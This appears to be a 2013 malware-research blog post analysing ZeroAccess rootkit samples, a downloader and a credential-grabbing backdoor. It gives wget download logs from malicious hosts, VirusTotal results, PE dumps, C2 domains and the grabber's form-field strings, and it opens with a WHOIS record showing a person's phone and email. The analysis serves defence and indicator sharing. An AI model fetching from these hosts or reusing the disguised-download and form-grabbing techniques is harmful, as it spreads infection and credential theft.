Registrant Name:wu liao
Registrant Organization:
Registrant Street1:xinyierbai 1-203
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:beijing
Registrant Postal Code:10000
Registrant Country:CN
Registrant Phone:+86.13564859684
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:wuliaijod20d13@hotmail.com
Name Server:NS71.DOMAINCONTROL.COM
Name Server:NS72.DOMAINCONTROL.COM

The Verdict

Downloaded PoC:

--2013-10-07 15:29:00--  h00p://gtrfeds.artisanent.info/m.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211968 (207K) [application/x-msdownload]
Saving to: `m.exe'
100%[=================================>] 211,968      110K/s   in 1.9s
2013-10-07 15:29:03 (110 KB/s) - `m.exe' saved [211968/211968]


--2013-10-07 15:29:12--  h00p://gtrfeds.artisanent.info/zs.exe
Resolving gtrfeds.artisanent.info... 158.255.6.116
Connecting to gtrfeds.artisanent.info|158.255.6.116|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52736 (52K) [application/x-msdownload]
Saving to: `zs.exe'
100%[=================================>] 52,736      56.4K/s   in 0.9s
2013-10-07 15:29:14 (56.4 KB/s) - `zs.exe' saved [52736/52736]
These are the samples:
2013/10/01  00:58  211,968 m.exe 8df1f6f7cf864df50f02cbab508564b0
2013/09/30  00:58  52,736 zs.exe 872031e4b8f8abfcadecb754a4f383a2
And the evidence of my download:


In Virus Total the report it shows:

   URL: https://www.virustotal.com/en/file/9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937/analysis/
   SHA256: 9dcbb64f365fdf6f80607d297d88134efa4a74ebadc3cc3c5effa9c4f8625937
   SHA1: d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
   MD5: 8df1f6f7cf864df50f02cbab508564b0
   File size: 207.0 KB ( 211968 bytes )
   File name: m.exe
   File type: Win32 EXE
   Tags: peexe
   Detection ratio: 29 / 45
   Analysis date: 2013-10-03 05:47:16 UTC ( 4 days, 1 hour ago )
---------------------------------------------------------------------
        Antivirus                  Result              Update
---------------------------------------------------------------------
   Bkav                 HW32.CDB.5ccc                 20131002
   MicroWorld-eScan     Trojan.Generic.9635821        20131003
   McAfee               ZeroAccess-FBJ!8DF1F6F7CF86   20131003
   Malwarebytes         Rootkit.0Access.RC            20131003
   K7AntiVirus          Riskware                      20131002
   K7GW                 Riskware                      20131002
   Norman               ZAccess.BHJZ                  20131002
   TrendMicro-HouseCall TROJ_GEN.F0C2C00J213          20131003
   Avast                Win32:Malware-gen             20131003
   Kaspersky            Backdoor.Win32.ZAccess.ecid   20131003
   BitDefender          Trojan.Generic.9635821        20131003
   SUPERAntiSpyware     Trojan.Agent/Gen-ZAccess      20131003
   Sophos               Mal/ZAccess-BL                20131003
   Comodo               UnclassifiedMalware           20131003
   F-Secure             Trojan.Generic.9635821        20131003
   AntiVir              TR/Rogue.9635412              20131002
   TrendMicro           TROJ_GEN.F0C2C00J213          20131003
   McAfee-GW-Edition    Artemis!8DF1F6F7CF86          20131003
   Emsisoft             Trojan.Generic.9635821 (B)    20131003
   Antiy-AVL            Backdoor/Win32.ZAccess.gen    20131003
   Kingsoft             Win32.Troj.Generic.a.(kcloud) 20130829
   Microsoft            TrojanDropper:Win32/Sirefef   20131003
   AhnLab-V3            Backdoor/Win32.ZAccess        20131002
   GData                Trojan.Generic.9635821        20131003
   ESET-NOD32           Win32/Sirefef.FY              20131002
   Ikarus               Trojan.Crypt2                 20131003
   Fortinet             W32/ZAccess.AX!tr             20131003
   AVG                  Crypt2.BJIS                   20131002
   Panda                Trj/Genetic.gen               20131002
and...
   URL: https://www.virustotal.com/en/file/8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1/analysis/
   SHA256: 8b807576a649a8a6c00ce8b4c655a050ac791ce0dfe1d99fae0d6e4467e069c1
   SHA1: a4b84fb5f160bc68ce6f6200c2aba05648909ec4
   MD5: 872031e4b8f8abfcadecb754a4f383a2
   File size: 51.5 KB ( 52736 bytes )
   File name: zs.exe
   File type: Win32 EXE
   Tags: peexe aspack
   Detection ratio: 32 / 48
   Analysis date: 2013-10-07 05:42:45 UTC ( 1 hour, 56 minutes ago )

--------------------------------------------------------------------------------
        Antivirus                          Result                     Update
--------------------------------------------------------------------------------

   Bkav                 HW32.CDB.70c0                                20131005
   MicroWorld-eScan     Gen:Variant.Graftor.116502                   20131007
   McAfee               RDN/Generic Downloader.x!in                  20131007
   Malwarebytes         Trojan.Delf.UKN                              20131007
   K7AntiVirus          Trojan                                       20131004
   K7GW                 Trojan                                       20131004
   Symantec             WS.Reputation.1                              20131007
   Norman               Troj_Generic.QBBRJ                           20131007
   TrendMicro-HouseCall TROJ_DLOADE.FCX                              20131007
   Avast                Win32:Malware-gen                            20131007
   Kaspersky            Trojan-Downloader.Win32.Delf.bbcn            20131007
   BitDefender          Gen:Variant.Graftor.116502                   20131007
   Agnitum              Trojan.DL.Delf!1XVARP0nySk                   20131006
   Emsisoft             Gen:Variant.Graftor.116502 (B)               20131007
   Comodo               UnclassifiedMalware                          20131007
   F-Secure             Gen:Variant.Graftor.116502                   20131007
   VIPRE                Trojan.Win32.Generic!BT                      20131007
   AntiVir              TR/Graftor.116502                            20131007
   TrendMicro           TROJ_DLOADE.FCX                              20131007
   McAfee-GW-Edition    Heuristic.BehavesLike.Win32.Suspicious-PKR.G 20131006
   Sophos               Mal/Generic-S                                20131007
   Panda                Trj/CI.A                                     20131006
   Kingsoft             Win32.TrojDownloader.Delf.bb.(kcloud)        20130829
   Microsoft            Trojan:Win32/Orsam!rts                       20131007
   AhnLab-V3            Downloader/Win32.Delf                        20131006
   GData                Gen:Variant.Graftor.116502                   20131007
   VBA32                suspected of Trojan.Downloader.gen.h         20131005
   ESET-NOD32           a variant of Win32/TrojanDownloader.Delf.RWG 20131007
   Ikarus               Win32.SuspectCrc                             20131007
   Fortinet             W32/Delf.RWG!tr.dldr                         20131007
   AVG                  Downloader.Generic13.BNCS                    20131006
   Baidu-International  Trojan.Win32.Downloader.Delf.RWG             20131006

Payload Details

m.exe

Info:
================================================================================
File Name:      m.exe
File Size:      211968 byte
Compile Time:   2005-03-30 03:17:14 <=== Fakes
DLL:            False
Sections:       4
MD5   hash:     8df1f6f7cf864df50f02cbab508564b0
SHA-1 hash:     d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Anti Debug:     Yes
Anti VM:        None
--------------------------------------------------------------------------------
Size:    211968 bytes
Type:    PE32 executable (GUI) Intel 80386, for MS Windows
MD5:     8df1f6f7cf864df50f02cbab508564b0
SHA1:    d015651dbaeb2a43dd70731af2ab0c7a5ddd9086
Date:    0x42499BAA [Tue Mar 29 18:17:14 2005 UTC] <== Fakes..Builder made..
EP:      0x404c0c .text  0/4 [SUSPICIOUS]
CRC:     Claimed: 0x33fe1, Actual: 0x33fe1
--------------------------------------------------------------------------------
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 04 00 AA 9B 49 42 00 00 00 00    PE..L.....IB....
0090   00 00 00 00 E0 00 82 81 0B 01 42 18 00 72 00 00    ..........B..r..
00A0   00 C6 02 00 00 00 00 00 0C 4C 00 00 00 10 00 00    .........L......
[...]

Sections:
================================================================================
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x718c       0x7200       4.942657
.rsrc      0x9000       0x29ca4      0x29e00      6.244711
.reloc     0x33000      0x244        0x400        1.173713
.rdata     0x34000      0x2228       0x2400       5.573327

File and URL:
================================================================================
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           d3d8thk.dll
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           KERNEL32.DLL
FILE:           OPENGL32.dll
FILE:           advapi32.dll
FILE:           d3d8.dll
FILE:           d3d8thk.dll
FILE:           reity.exe
URL:            None

Suspicious API Functions:
================================================================================
Func. Name:     OpenFileMappingA
Func. Name:     GetModuleHandleA
Func. Name:     FindResourceExA
Func. Name:     GetModuleFileNameA
Func. Name:     GetComputerNameA
Func. Name:     VirtualAllocEx  <=====
Func. Name:     VirtualAllocEx  <=====
Func. Name:     GetTempPathA
Func. Name:     GetModuleFileNameA
Func. Name:     IsDebuggerPresent
Func. Name:     FindResourceExW
Func. Name:     GetVersionExA
Func. Name:     GetFileAttributesExA
Func. Name:     GetFileAttributesExA
Func. Name:     SetWindowsHookExA
Func. Name:     GetProcAddress
Func. Name:     FindResourceA
Func. Name:     ConnectNamedPipe
Func. Name:     FindFirstFileA
Func. Name:     VirtualProtectEx
Func. Name:     GetFileAttributesA
Func. Name:     GetComputerNameA

Suspicious API Anti-Debug:
Anti Debug:     IsDebuggerPresent

Version info
================================================================================
LegalCopyright: Voleter it(c) \xa9 2012
InternalName: ejbnisgj
FileVersion: a 2 RC87.44060017.189e
CompanyName: Voleter it(c)
ProductName: Voleter it(c)
ProductVersion: 122.19153 RelC
FileDescription: Voleter it(c)
OriginalFilename: ejbnisgj.exe
Translation: 0x0409 0x04b0
I won't write much this in very details, please refer to my previous analysis-->HERE in the binary part, to tell us a lot. Please see the correct statement in VirusTotal behavior analysis here-->HERE, but see the VT summary is below:

The usage of GeoIP: the attempt to download it from MaxMind site and the UDP communication tells usual pattern of ZA.
Again, please refer to this-->HERE for the details.

PoC of ZeroAccess Botnet is up and alive

ZeroAccess network:

When I run it.. below is the DNS communication, I gave ZA all they want to access the botnet (if there is a botnet still up..)

Honestly, why I did not see ANY downtime of these ZeroAccess peer communication?
Now hickups or slowdown in this communication at all, what really was shutdowned??
Later on in the PCAP sample you can count yourself how fast the rotation peer access were called, this is just as per usual speed I saw in previous analysis of ZeroAccess, nothing changed (sadly..)

The ZeroAccess "acompanied" Trojan "A" - downloader: zs.exe

Binary info:

File:    ./zs.exe
Size:    52736 bytes
Type:    PE32 executable (GUI) Intel 80386, for MS Windows
MD5:     872031e4b8f8abfcadecb754a4f383a2
SHA1:    a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Date:    0x5247BBB7 [Sun Sep 29 05:33:43 2013 UTC]
EP:      0x42e001 .DB 10/12 [SUSPICIOUS]
CRC:     Claimed: 0x0, Actual: 0x1a3f8 [SUSPICIOUS]
--------------------------------------------------------------------------------
Packer:
ASProtect V2.X DLL -> Alexey Solodovnikov - additionalASProtect V2.X DLL -> Alexey Solodovnikov
ASPack v2.12 - additionalASPack v2.12
ASPack v2.1 - additional
--------------------------------------------------------------------------------
File Name:      zs.exe
File Size:      52736 byte
Compile Time:   2013-09-29 14:33:43
DLL:            False
Sections:       12
MD5   hash:     872031e4b8f8abfcadecb754a4f383a2
SHA-1 hash:     a4b84fb5f160bc68ce6f6200c2aba05648909ec4
Anti Debug:     None
Anti VM:        None
---------------------------------------------------------------------------------
Entry Point at 0xbc01
Virtual Address is 0x42e001

0000   4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00    MZP.............
0010   B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00    ................
0040   BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90    ........!..L.!..
0050   54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73    This program mus
0060   74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57    t be run under W
0070   69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00    in32..$7........
0080   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
 [...]
00F0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0100   50 45 00 00 4C 01 0C 00 B7 BB 47 52 00 00 00 00    PE..L.....GR....
0110   00 00 00 00 E0 00 8E 81 0B 01 02 19 00 C2 01 00    ................
0120   00 62 00 00 00 00 00 00 01 E0 02 00 00 10 00 00    .b..............
0130   00 E0 01 00 00 00 40 00 00 10 00 00 00 02 00 00    ......@.........
[...]

Resource entries
================================================================================
Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_STRING          0x2c218  0x74     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c28c  0x298    LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c524  0xd4     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c5f8  0xa4     LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c69c  0x29c    LANG_NEUTRAL SUBLANG_NEUTRAL          data
RT_STRING          0x2c938  0x368    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_STRING          0x2cca0  0x288    LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_RCDATA          0x2cf28  0x10     LANG_NEUTRAL SUBLANG_NEUTRAL          empty
RT_RCDATA          0x2cf38  0x128    LANG_NEUTRAL SUBLANG_NEUTRAL          empty

Sections
================================================================================
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x1c000      0x9800       7.985545    [SUSPICIOUS]
.itext     0x1d000      0x1000       0x400        6.023927
.data      0x1e000      0x2000       0xa00        7.169703    [SUSPICIOUS]
.bss       0x20000      0x5000       0x0          0.000000    [SUSPICIOUS]
.idata     0x25000      0x1000       0x600        6.466433
.didata    0x26000      0x1000       0x200        2.176323
.tls       0x27000      0x1000       0x0          0.000000    [SUSPICIOUS]
.rdata     0x28000      0x1000       0x200        0.210826    [SUSPICIOUS]
.reloc     0x29000      0x3000       0x0          0.000000    [SUSPICIOUS]
.rsrc      0x2c000      0x2000       0x800        6.544777
.DB        0x2e000      0x2000       0x1200       5.804077
.adata     0x30000      0x1000       0x0          0.000000    [SUSPICIOUS]
--------------------------------------------------------------------------------
File and URL:
FILE:           kernel32.dll
FILE:           user32.dll
FILE:           kernel32.dll
FILE:           oleaut32.dll
FILE:           advapi32.dll
FILE:           user32.dll
FILE:           user32.dll
URL:            None
--------------------------------------------------------------------------------
Suspicious API Functions:
Func. Name:     GetProcAddress
Func. Name:     GetModuleHandleA
Func. Name:     LoadLibraryA
Func. Name:     LoadLibraryA
--------------------------------------------------------------------------------
Suspicious Sections:
Sect. Name:     .text^@^@^@
MD5   hash:     607a461cb659e5a10b566434de7fa3d3
SHA-1 hash:     b1bf940acbcb37877a5513d7385765d1937a0ea1
Sect. Name:     .data^@^@^@
MD5   hash:     46564b11f19cb7c4fd0da8e27fd4f394
SHA-1 hash:     03f78fc221ae145c9311ef0bfd98b0d6e3acd793
Sect. Name:     .bss^@^@^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .tls^@^@^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .rdata^@^@
MD5   hash:     3dbb241e3190fbd14c8a44da3a00e61b
SHA-1 hash:     8247038ba6b52fb73328ca11fe47df8633ced36f
Sect. Name:     .reloc^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709
Sect. Name:     .adata^@^@
MD5   hash:     d41d8cd98f00b204e9800998ecf8427e
SHA-1 hash:     da39a3ee5e6b4b0d3255bfef95601890afd80709

What does it do? Yes, is a downloader, ALIVE one:, it downloaded WHAT LOOKS LIKE IMAGE FILE from dswarqryg.com

You'll see some requests like below:
..with each request session is:

..and redirect you to download these:

PS: BLOCK THESE DOMAINS!!!
idwrlliewrwp.com/ssany.jpg
sd.newaot.com/xxswq.jpg
PoC:


Of course the purpose is the camouflage of PE file download blocking:

We can see it actualy saved in %TEMP%...

As PE binaries of ANOTHER malware file...

We found also others download URL and saved file name in the binary:

And from reversing, it showed it is targeted to below OS version:
32-bit Edition
64-bit Edition
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 2000
Windows XP

Zero Access "Accompanied" Trojan "B" - the Backdoor as Service: "SpringSvc.exe"

Well, the binary downloaded to be saved in the %WINDOWS% directory with below VT details:

   URL: https://www.virustotal.com/en/file/0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e/analysis/
   SHA256:0ddb20210558a5d95aa90ebbda3c666b46321af1c70319ce8aebbc1dfcfd754e
   SHA1: 6388534e59b78f1d68165ab454f3f5bfd3803fde
   MD5: 9b34ca74c08a890af5b9f692d68516c3
   File size: 354.0 KB ( 362496 bytes )
   File name: SpringSvc.exe
   File type: Win32 EXE
   Tags: peexe
   Detection ratio: 23 / 48
   Analysis date: 2013-10-07 11:27:28 UTC ( 2 minutes ago )
--------------------------------------------------------------------------
        Antivirus                        Result                   Update
--------------------------------------------------------------------------
   Bkav                 HW32.CDB.B3ff                            20131007
   MicroWorld-eScan     Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   CAT-QuickHeal        (Suspicious) - DNAScan                   20131007
   McAfee               Artemis!9B34CA74C08A                     20131007
   Malwarebytes         Trojan.Agent.EDC                         20131007
   K7AntiVirus          Trojan                                   20131004
   K7GW                 Trojan                                   20131004
   Symantec             WS.Reputation.1                          20131007
   TrendMicro-HouseCall TROJ_GEN.R0CBH07J613                     20131007
   Kaspersky            Trojan.Win32.Agent.acbkp                 20131007
   BitDefender          Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   Agnitum              Suspicious!SA                            20131006
   Sophos               Mal/Generic-S                            20131007
   F-Secure             Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   AntiVir              TR/Spy.362496.35                         20131007
   McAfee-GW-Edition    Heuristic.LooksLike.Win32.SuspiciousPE.C 20131007
   Emsisoft             Gen:Trojan.Heur.FU.wS0@aKIipfmj (B)      20131007
   Panda                Suspicious file                          20131007
   GData                Gen:Trojan.Heur.FU.wS0@aKIipfmj          20131007
   AhnLab-V3            Trojan/Win32.Agent                       20131007
   ESET-NOD32           a variant of Win32/Spy.Wagiclas.AC       20131007
   Fortinet             W32/Agent.ACBKP!tr                       20131007
   AVG                  PSW.Generic12.AYU                        20131007
..and the binary was compiled by Borland-base Builder/SDK
FastMM Borland Edition 
2004, 2005 Pierre le Riche / Professional Software Development
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
Software\Borland\Delphi\Locales

OK.. OK..OK, got it! But WHAT does it Do??

This downloaded file will be executed by the previous downloader:

And does the process injection the reside as service:
PoC of service calls from reversing:

StartServiceA
StartServiceCtrlDispatcherA
CreateServiceA
And then this SpringSvc.exe contacts mothership in kdsousom.com / 67.198.168 .115 which poking for "package":

And a grabber:
<form
name="
name=
type="hidden"
type=hidden
<input
value=
/select>
/textarea>
</form
Elements
Item
Forms
Length
tagName
INPUT
type
text
Name
Value
...of the phishing credential data:
NAME
FIRST
title
LAST
PHONE
ZIP
MAIL
BIRTH
YYYY
yyyy
password
checkbox
checked
radio
checked
checked
TEXTAREA
call me,Thank you.
not sure
SELECT
sex
options
length
text
selectedindex
onchange
value
selectedindex
SUBMIT
SEARCH
Value
LOGIN
SIGN IN
submit
Click

Yes, is a backdoor requesting and passing credentials which we're sure there's nothing good in it..

Epilogue

Friends, my point is simple, ZeroAccess is out there still lurking at us.
These samples and network are fresh and new.. this post is a PoC of the existance of ZeroAccess in the wild.
Any of the bad domains mentioned are exposed as target to be shutdown.
I will share the samples shortly, after sorting things out. Stay secure!

Additional

Samples Download

We share the samples and the malicious botnet traffic with trojan callback traffic for raising detection ratio and research purpose only to known researchers.
I will ask many questions to share the sample above to none of the described criteria.
Here's the downloads, click the picture to access:

Samples/PE Binaries

(password needed - ask by DM to @malwaremustdie in twitter)

Traffic in PCAP:

(no password)

#MalwareMustDie!